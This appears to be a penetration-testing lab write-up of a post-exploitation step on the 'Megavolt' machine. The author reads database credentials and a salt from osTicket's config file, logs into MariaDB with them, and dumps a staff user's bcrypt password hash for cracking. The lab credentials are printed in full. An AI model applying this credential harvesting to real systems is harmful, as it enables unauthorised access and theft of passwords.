InfoSec LAB

Megavolt_MySQL

Created: 2 min read

MySQL

There is a MySQL instance running on the port 3306

bash-4.2$ cat ost-config.php | grep -v '^[#/]'
<?php
    ost-config.php
 
    Static osTicket configuration file. Mainly useful for mysql login info.
    Created during installation process and shouldn't change even on upgrades.
 
    Peter Rotich <peter@osticket.com>
    Copyright (c)  2006-2010 osTicket
    http://www.osticket.com
 
    Released under the GNU General Public License WITHOUT ANY WARRANTY.
    See LICENSE.TXT for details.
 
    vim: expandtab sw=4 ts=4 sts=4:
    $Id: $
**********************************************************************/
 
if(!strcasecmp(basename($_SERVER['SCRIPT_NAME']),basename(__FILE__)) || !defined('INCLUDE_DIR'))
    die('kwaheri rafiki!');
 
define('OSTINSTALLED',TRUE);
if(OSTINSTALLED!=TRUE){
    if(!file_exists(ROOT_DIR.'setup/install.php')) die('Error: Contact system admin.'); //Something is really wrong!
    //Invoke the installer.
    header('Location: '.ROOT_PATH.'setup/install.php');
    exit;
}
 
define('SECRET_SALT','PrIE8Px449XXWTb=8cRNZcvvFz8STnoq');
define('ADMIN_EMAIL','admin@example.com');
 
define('DBTYPE','mysql');
define('DBHOST','localhost');
define('DBNAME','osticket');
define('DBUSER','osticket');
define('DBPASS','PopsicleCredibleSurvivor');
define('TABLE_PREFIX','ost_');
define('TRUSTED_PROXIES', '');
define('LOCAL_NETWORKS', '127.0.0.0/24');
 
?>

The ost-config.php file contains the DB credential; osticket:PopsicleCredibleSurvivor This file was picked up by PEAS as well

bash-4.2$ mysql -hlocalhost -uosticket -pPopsicleCredibleSurvivor
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 2441
Server version: 5.5.65-MariaDB MariaDB Server
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]>

Connection established

osticket.ost_staff Table

MariaDB [(none)]> selselect username,passwd from osticket.ost_staff;
select username,passwd from osticket.ost_staff;
+----------+--------------------------------------------------------------+
| username | passwd                                                       |
+----------+--------------------------------------------------------------+
| alfred   | $2a$08$.jEaoPx3FkmxW48UPnyAWOzjwFwiSFZJKUjZpQzh9Sreu0uamm7BO |
+----------+--------------------------------------------------------------+
1 row in set (0.00 sec)

Password hash found for the alfred user hascat was unable to crack the password hash N/A

Interactive Graph View

Backlinks